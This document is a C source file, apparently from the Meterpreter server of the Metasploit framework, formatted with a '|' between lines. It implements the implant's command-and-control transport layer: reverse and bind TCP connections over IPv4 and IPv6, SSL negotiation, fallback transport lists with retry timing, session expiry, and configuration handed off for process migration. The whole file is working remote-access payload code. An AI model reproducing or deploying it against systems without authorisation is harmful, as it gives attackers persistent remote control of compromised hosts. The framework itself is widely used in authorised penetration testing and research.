* @brief Configure the TCP connnection. If it doesn't exist, go ahead and estbalish it.
|
|
* @param remote Pointer to the remote instance with the TCP transport details wired in.
|
|
* @param sock Reference to the original socket FD passed to metsrv.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static BOOL configure_tcp_connection(Transport* transport) {
|
|
DWORD result = ERROR_SUCCESS;
|
|
size_t charsConverted;
|
|
char tempUrl[512] = {0};
|
|
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
|
|
|
|
// check if comms is already open via a staged payload
|
|
if (ctx->fd) {
|
|
dprintf("[TCP] Connection already running on %u", ctx->fd);
|
|
}
|
|
else {
|
|
dprintf("[TCP CONFIGURE] Url: %s", transport->url);
|
|
|
|
// copy the URL to the temp location and work from there
|
|
// so that we don't damage the original URL while breaking
|
|
// it up into its individual parts.
|
|
strncpy(tempUrl, transport->url, sizeof(tempUrl) - 1);
|
|
|
|
//transport->start_time = current_unix_timestamp();
|
|
transport->comms_last_packet = current_unix_timestamp();
|
|
|
|
if (strncmp(tempUrl, "tcp", 3) == 0) {
|
|
char* pHost = strstr(tempUrl, "//") + 2;
|
|
char* pPort = strrchr(pHost, ':') + 1;
|
|
|
|
// check if we're using IPv6
|
|
if (tempUrl[3] == '6') {
|
|
char* pScopeId = strrchr(pHost, '?') + 1;
|
|
*(pScopeId - 1) = '\0';
|
|
*(pPort - 1) = '\0';
|
|
dprintf("[STAGELESS] IPv6 host %s port %S scopeid %S", pHost, pPort, pScopeId);
|
|
result = reverse_tcp6(pHost, pPort, atol(pScopeId), transport->timeouts.retry_total,
|
|
transport->timeouts.retry_wait, &ctx->fd);
|
|
}
|
|
else {
|
|
u_short usPort = (u_short)atoi(pPort);
|
|
|
|
// if no host is specified, then we can assume that this is a bind payload, otherwise
|
|
// we'll assume that the payload is a reverse_tcp one and the given host is valid
|
|
if (*pHost == ':') {
|
|
dprintf("[STAGELESS] IPv4 bind port %s", pPort);
|
|
result = bind_tcp(usPort, &ctx->fd);
|
|
}
|
|
else {
|
|
*(pPort - 1) = '\0';
|
|
dprintf("[STAGELESS] IPv4 host %s port %s", pHost, pPort);
|
|
result = reverse_tcp4(pHost, usPort, transport->timeouts.retry_total,
|
|
transport->timeouts.retry_wait, &ctx->fd);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
if (result != ERROR_SUCCESS) {
|
|
dprintf("[SERVER] Something went wrong %u", result);
|
|
return FALSE;
|
|
}
|
|
|
|
dprintf("[SERVER] Looking good, FORWARD!");
|
|
|
|
dprintf("[SERVER] Flushing the socket handle...");
|
|
server_socket_flush(transport);
|
|
|
|
// Short term hack to be removed when the stageless stuff works.
|
|
// Flush the socket a second time to ignore the payload if we're
|
|
// reconnecting
|
|
server_socket_flush(transport);
|
|
|
|
transport->comms_last_packet = current_unix_timestamp();
|
|
|
|
dprintf("[SERVER] Initializing SSL...");
|
|
if (!server_initialize_ssl(transport)) {
|
|
return FALSE;
|
|
}
|
|
|
|
dprintf("[SERVER] Negotiating SSL...");
|
|
if (!server_negotiate_ssl(transport)) {
|
|
return FALSE;
|
|
}
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*!
|
|
* @brief Get the socket from the transport (if it's TCP).
|
|
* @param transport Pointer to the TCP transport containing the socket.
|
|
* @return The current transport socket FD, if any, or zero.
|
|
*/
|
|
static SOCKET transport_get_socket_tcp(Transport* transport) {
|
|
if (transport && transport->type == METERPRETER_TRANSPORT_SSL) {
|
|
return ((TcpTransportContext*)transport->ctx)->fd;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
/*!
|
|
* @brief Creates a new TCP transport instance.
|
|
* @param url URL containing the transport details.
|
|
* @param timeouts The timeout values to use for this transport.
|
|
* @return Pointer to the newly configured/created TCP transport instance.
|
|
*/
|
|
static Transport* transport_create_tcp(MetsrvTransportTcp* config) {
|
|
Transport* transport = (Transport*)malloc(sizeof(Transport));
|
|
TcpTransportContext* ctx = (TcpTransportContext*)malloc(sizeof(TcpTransportContext));
|
|
|
|
dprintf("[TRANS TCP] Creating tcp transport for url %s", config->common.url);
|
|
|
|
memset(transport, 0, sizeof(Transport));
|
|
memset(ctx, 0, sizeof(TcpTransportContext));
|
|
|
|
transport->type = METERPRETER_TRANSPORT_SSL;
|
|
transport->timeouts.comms = config->common.comms_timeout;
|
|
transport->timeouts.retry_total = config->common.retry_total;
|
|
transport->timeouts.retry_wait = config->common.retry_wait;
|
|
transport->url = strdup(config->common.url);
|
|
transport->packet_transmit = packet_transmit_via_ssl;
|
|
transport->transport_init = configure_tcp_connection;
|
|
transport->transport_deinit = server_destroy_ssl;
|
|
transport->transport_destroy = transport_destroy_tcp;
|
|
transport->transport_reset = transport_reset_tcp;
|
|
transport->server_dispatch = server_dispatch_tcp;
|
|
transport->get_socket = transport_get_socket_tcp;
|
|
transport->ctx = ctx;
|
|
transport->comms_last_packet = current_unix_timestamp();
|
|
|
|
return transport;
|
|
}
|
|
|
|
static Transport* create_transport(Remote* remote, MetsrvTransportCommon* transportCommon, LPDWORD size) {
|
|
Transport* transport = NULL;
|
|
dprintf("[TRNS] Transport claims to have URL: %s", transportCommon->url);
|
|
dprintf("[TRNS] Transport claims to have comms: %d", transportCommon->comms_timeout);
|
|
dprintf("[TRNS] Transport claims to have retry total: %d", transportCommon->retry_total);
|
|
dprintf("[TRNS] Transport claims to have retry wait: %d", transportCommon->retry_wait);
|
|
|
|
if (strncmp(transportCommon->url, "tcp", 3) == 0) {
|
|
if (size) {
|
|
*size = sizeof(MetsrvTransportTcp);
|
|
}
|
|
transport = transport_create_tcp((MetsrvTransportTcp*)transportCommon);
|
|
}
|
|
|
|
if (transport == NULL)
|
|
{
|
|
// something went wrong
|
|
return NULL;
|
|
}
|
|
|
|
// always insert at the tail. The first transport will be the one that kicked everything off
|
|
if (remote->transport == NULL) {
|
|
// point to itself, as this is the first transport.
|
|
transport->next_transport = transport->prev_transport = transport;
|
|
remote->transport = transport;
|
|
}
|
|
else {
|
|
transport->prev_transport = remote->transport->prev_transport;
|
|
transport->next_transport = remote->transport;
|
|
|
|
remote->transport->prev_transport->next_transport = transport;
|
|
remote->transport->prev_transport = transport;
|
|
}
|
|
|
|
// share the lock with the transport
|
|
transport->lock = remote->lock;
|
|
|
|
return transport;
|
|
}
|
|
|
|
static void append_transport(Transport** list, Transport* newTransport) {
|
|
if (*list == NULL) {
|
|
// point to itself!
|
|
newTransport->next_transport = newTransport->prev_transport = newTransport;
|
|
*list = newTransport;
|
|
}
|
|
else {
|
|
// always insert at the tail
|
|
newTransport->prev_transport = (*list)->prev_transport;
|
|
newTransport->next_transport = (*list);
|
|
|
|
(*list)->prev_transport->next_transport = newTransport;
|
|
(*list)->prev_transport = newTransport;
|
|
}
|
|
}
|
|
|
|
static void remove_transport(Remote* remote, Transport* oldTransport) {
|
|
// if we point to ourself, then we're the last one
|
|
if (remote->transport->next_transport == remote->transport) {
|
|
remote->transport = NULL;
|
|
}
|
|
else {
|
|
// if we're removing the current one we need to move the pointer to the
|
|
// next one in the list.
|
|
if (remote->transport == oldTransport) {
|
|
remote->transport = remote->transport->next_transport;
|
|
}
|
|
|
|
oldTransport->prev_transport->next_transport = oldTransport->next_transport;
|
|
oldTransport->next_transport->prev_transport = oldTransport->prev_transport;
|
|
}
|
|
|
|
oldTransport->transport_destroy(oldTransport);
|
|
}
|
|
|
|
static BOOL create_transports(Remote* remote, MetsrvTransportCommon* transports, LPDWORD parsedSize) {
|
|
DWORD totalSize = 0;
|
|
MetsrvTransportCommon* current = transports;
|
|
|
|
// The first part of the transport is always the URL, if it's NULL, we are done.
|
|
while (current->url[0] != 0) {
|
|
DWORD size;
|
|
if (create_transport(remote, current, &size) != NULL) {
|
|
dprintf("[TRANS] transport created of size %u", size);
|
|
totalSize += size;
|
|
|
|
// go to the next transport based on the size of the existing one.
|
|
current = (MetsrvTransportCommon*)((LPBYTE)current + size);
|
|
}
|
|
else {
|
|
// This is not good
|
|
return FALSE;
|
|
}
|
|
}
|
|
|
|
// account for the last terminating NULL wchar
|
|
*parsedSize = totalSize + sizeof(wchar_t);
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*!
|
|
* @brief Create a configuration block from the given transport.
|
|
* @param transport Transport data to create the configuration from.
|
|
* @return config Pointer to the config block to write to.
|
|
*/
|
|
static void transport_write_tcp_config(Transport* transport, MetsrvTransportTcp* config) {
|
|
if (transport && config) {
|
|
config->common.comms_timeout = transport->timeouts.comms;
|
|
config->common.retry_total = transport->timeouts.retry_total;
|
|
config->common.retry_wait = transport->timeouts.retry_wait;
|
|
strncpy(config->common.url, transport->url, URL_SIZE);
|
|
}
|
|
}
|
|
|
|
static void config_create(Remote* remote, MetsrvConfig** config, LPDWORD size) {
|
|
// This function is really only used for migration purposes.
|
|
DWORD s = sizeof(MetsrvSession);
|
|
MetsrvSession* sess = (MetsrvSession*)malloc(s);
|
|
memset(sess, 0, s);
|
|
|
|
dprintf("[CONFIG] preparing the configuration");
|
|
|
|
// start by preparing the session.
|
|
memcpy(sess->uuid, remote->orig_config->session.uuid, UUID_SIZE);
|
|
sess->expiry = remote->sess_expiry_end - current_unix_timestamp();
|
|
|
|
// TOOD: figure what we should be doing for POSIX here.
|
|
sess->exit_func = 0;
|
|
|
|
Transport* current = remote->transport;
|
|
Transport* t = remote->transport;
|
|
do {
|
|
// extend memory appropriately
|
|
DWORD neededSize = t->type == METERPRETER_TRANSPORT_SSL ? sizeof(MetsrvTransportTcp) : sizeof(MetsrvTransportHttp);
|
|
|
|
dprintf("[CONFIG] Allocating %u bytes for %s transport, total of %u bytes", neededSize, t->type == METERPRETER_TRANSPORT_SSL ? "ssl" : "http/s", s);
|
|
|
|
sess = (MetsrvSession*)realloc(sess, s + neededSize);
|
|
|
|
// load up the transport specifics
|
|
LPBYTE target = (LPBYTE)sess + s;
|
|
|
|
memset(target, 0, neededSize);
|
|
s += neededSize;
|
|
|
|
if (t->type == METERPRETER_TRANSPORT_SSL) {
|
|
transport_write_tcp_config(t, (MetsrvTransportTcp*)target);
|
|
dprintf("[CONFIG] TCP Comms Timeout: %d", ((MetsrvTransportTcp*)target)->common.comms_timeout);
|
|
dprintf("[CONFIG] TCP Retry Total: %d", ((MetsrvTransportTcp*)target)->common.retry_total);
|
|
dprintf("[CONFIG] TCP Retry Wait: %d", ((MetsrvTransportTcp*)target)->common.retry_wait);
|
|
dprintf("[CONFIG] TCP URL: %s", ((MetsrvTransportTcp*)target)->common.url);
|
|
|
|
// if the current transport is TCP, copy the socket fd over so that migration can use it.
|
|
if (t == current) {
|
|
sess->comms_fd = (DWORD)t->get_socket(t);
|
|
}
|
|
}
|
|
|
|
t = t->next_transport;
|
|
} while (t != current);
|
|
|
|
// account for the last terminating NULL wchar so that the target knows the list has reached the end,
|
|
// as well as the end of the extensions list. We may support wiring up existing extensions later on.
|
|
DWORD terminatorSize = sizeof(wchar_t) + sizeof(DWORD);
|
|
sess = (MetsrvSession*)realloc(sess, s + terminatorSize);
|
|
memset((LPBYTE)sess + s, 0, terminatorSize);
|
|
s += terminatorSize;
|
|
|
|
// hand off the data
|
|
dprintf("[CONFIG] Total of %u bytes located at 0x%p", s, sess);
|
|
*size = s;
|
|
*config = (MetsrvConfig*)sess;
|
|
}
|
|
|
|
/*!
|
|
* @brief Setup and run the server. This is called from Init via the loader.
|
|
* @param fd The original socket descriptor passed in from the stager, or a pointer to stageless extensions.
|
|
* @return Meterpreter exit code (ignored by the caller).
|
|
*/
|
|
DWORD server_setup(MetsrvConfig* config)
|
|
{
|
|
THREAD * serverThread = NULL;
|
|
Remote *remote = NULL;
|
|
char cStationName[256] = { 0 };
|
|
char cDesktopName[256] = { 0 };
|
|
DWORD res = 0;
|
|
|
|
dprintf("[SERVER] Initializing...");
|
|
int local_error = 0;
|
|
|
|
dprintf("[SERVER] Initializing from configuration: 0x%p", config);
|
|
dprintf("[SESSION] Comms Fd: %u", config->session.comms_fd);
|
|
dprintf("[SESSION] Expiry: %u", config->session.expiry);
|
|
|
|
srand(time(NULL));
|
|
|
|
// Open a THREAD item for the servers main thread, we use this to manage migration later.
|
|
serverThread = thread_open();
|
|
dprintf("[SERVER] main server thread: handle=0x%08X id=0x%08X sigterm=0x%08X",
|
|
serverThread->handle, serverThread->id, serverThread->sigterm);
|
|
|
|
if (!(remote = remote_allocate())) {
|
|
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
|
|
goto out;
|
|
}
|
|
|
|
remote->orig_config = config;
|
|
remote->sess_expiry_time = config->session.expiry;
|
|
remote->sess_start_time = current_unix_timestamp();
|
|
remote->sess_expiry_end = remote->sess_start_time + config->session.expiry;
|
|
|
|
remote->orig_config = config;
|
|
remote->sess_expiry_time = config->session.expiry;
|
|
remote->sess_start_time = current_unix_timestamp();
|
|
remote->sess_expiry_end = remote->sess_start_time + config->session.expiry;
|
|
|
|
dprintf("[DISPATCH] Session going for %u seconds from %u to %u", remote->sess_expiry_time, remote->sess_start_time, remote->sess_expiry_end);
|
|
|
|
DWORD transportSize = 0;
|
|
if (!create_transports(remote, config->transports, &transportSize)) {
|
|
// not good, bail out!
|
|
SetLastError(ERROR_INVALID_PARAMETER);
|
|
goto out;
|
|
}
|
|
|
|
// the first transport should match the transport that we initially connected on.
|
|
// If it's TCP comms, we need to wire that up.
|
|
if (config->session.comms_fd) {
|
|
((TcpTransportContext*)remote->transport->ctx)->fd = (SOCKET)config->session.comms_fd;
|
|
}
|
|
|
|
// TODO: need to implement this when we have the valid approach done for stageless.
|
|
//load_stageless_extensions(remote, (MetsrvExtension*)((LPBYTE)config->transports + transportSize));
|
|
|
|
// Set up the transport creation function pointer
|
|
remote->trans_create = create_transport;
|
|
// Set up the transport removal function pointer
|
|
remote->trans_remove = remove_transport;
|
|
// and the config creation pointer
|
|
remote->config_create = config_create;
|
|
|
|
// Store our thread handle
|
|
remote->server_thread = serverThread->handle;
|
|
|
|
dprintf("[SERVER] Registering dispatch routines...");
|
|
register_dispatch_routines();
|
|
|
|
remote->sess_start_time = current_unix_timestamp();
|
|
|
|
// loop through the transports, reconnecting each time.
|
|
while (remote->transport) {
|
|
if (remote->transport->transport_init) {
|
|
dprintf("[SERVER] attempting to initialise transport 0x%p", remote->transport);
|
|
// Each transport has its own set of retry settings and each should honour
|
|
// them individually.
|
|
if (!remote->transport->transport_init(remote->transport)) {
|
|
dprintf("[SERVER] transport initialisation failed, moving to the next transport");
|
|
remote->transport = remote->transport->next_transport;
|
|
|
|
// when we have a list of transports, we'll iterate to the next one.
|
|
continue;
|
|
}
|
|
}
|
|
|
|
dprintf("[SERVER] Entering the main server dispatch loop for transport %x, context %x", remote->transport, remote->transport->ctx);
|
|
DWORD dispatchResult = remote->transport->server_dispatch(remote, serverThread);
|
|
|
|
dprintf("[DISPATCH] dispatch exited with result: %u", dispatchResult);
|
|
if (remote->transport->transport_deinit) {
|
|
dprintf("[DISPATCH] deinitialising transport");
|
|
remote->transport->transport_deinit(remote->transport);
|
|
}
|
|
|
|
dprintf("[TRANS] resetting transport");
|
|
if (remote->transport->transport_reset) {
|
|
remote->transport->transport_reset(remote->transport, dispatchResult == ERROR_SUCCESS && remote->next_transport == NULL);
|
|
}
|
|
|
|
// If the transport mechanism failed, then we should loop until we're able to connect back again.
|
|
if (dispatchResult == ERROR_SUCCESS) {
|
|
dprintf("[DISPATCH] Server requested shutdown of dispatch");
|
|
// But if it was successful, and this is a valid exit, then we should clean up and leave.
|
|
if (remote->next_transport == NULL) {
|
|
dprintf("[DISPATCH] No next transport specified, leaving");
|
|
// we weren't asked to switch transports, so we exit.
|
|
break;
|
|
}
|
|
|
|
// we need to change transports to the one we've been given. We will assume, for now,
|
|
// that the transport has been created using the appropriate functions and that it is
|
|
// part of the transport list.
|
|
dprintf("[TRANS] Moving transport from 0x%p to 0x%p", remote->transport, remote->next_transport);
|
|
remote->transport = remote->next_transport;
|
|
remote->next_transport = NULL;
|
|
|
|
if (remote->next_transport_wait > 0) {
|
|
dprintf("[TRANS] Sleeping for %u seconds ...", remote->next_transport_wait);
|
|
sleep(remote->next_transport_wait);
|
|
// the wait is a once-off thing, needs to be reset each time
|
|
remote->next_transport_wait = 0;
|
|
}
|
|
}
|
|
else {
|
|
// move to the next one in the list
|
|
dprintf("[TRANS] Moving transport from 0x%p to 0x%p", remote->transport, remote->transport->next_transport);
|
|
remote->transport = remote->transport->next_transport;
|
|
}
|
|
}
|
|
|
|
// clean up the transports
|
|
while (remote->transport)
|
|
{
|
|
remove_transport(remote, remote->transport);
|
|
}
|
|
|
|
dprintf("[SERVER] Deregistering dispatch routines...");
|
|
deregister_dispatch_routines(remote);
|
|
|
|
remote_deallocate(remote);
|
|
|
|
out:
|
|
res = GetLastError();
|
|
|
|
dprintf("[SERVER] Finished.");
|
|
return res == ERROR_SUCCESS;
|
|
}
|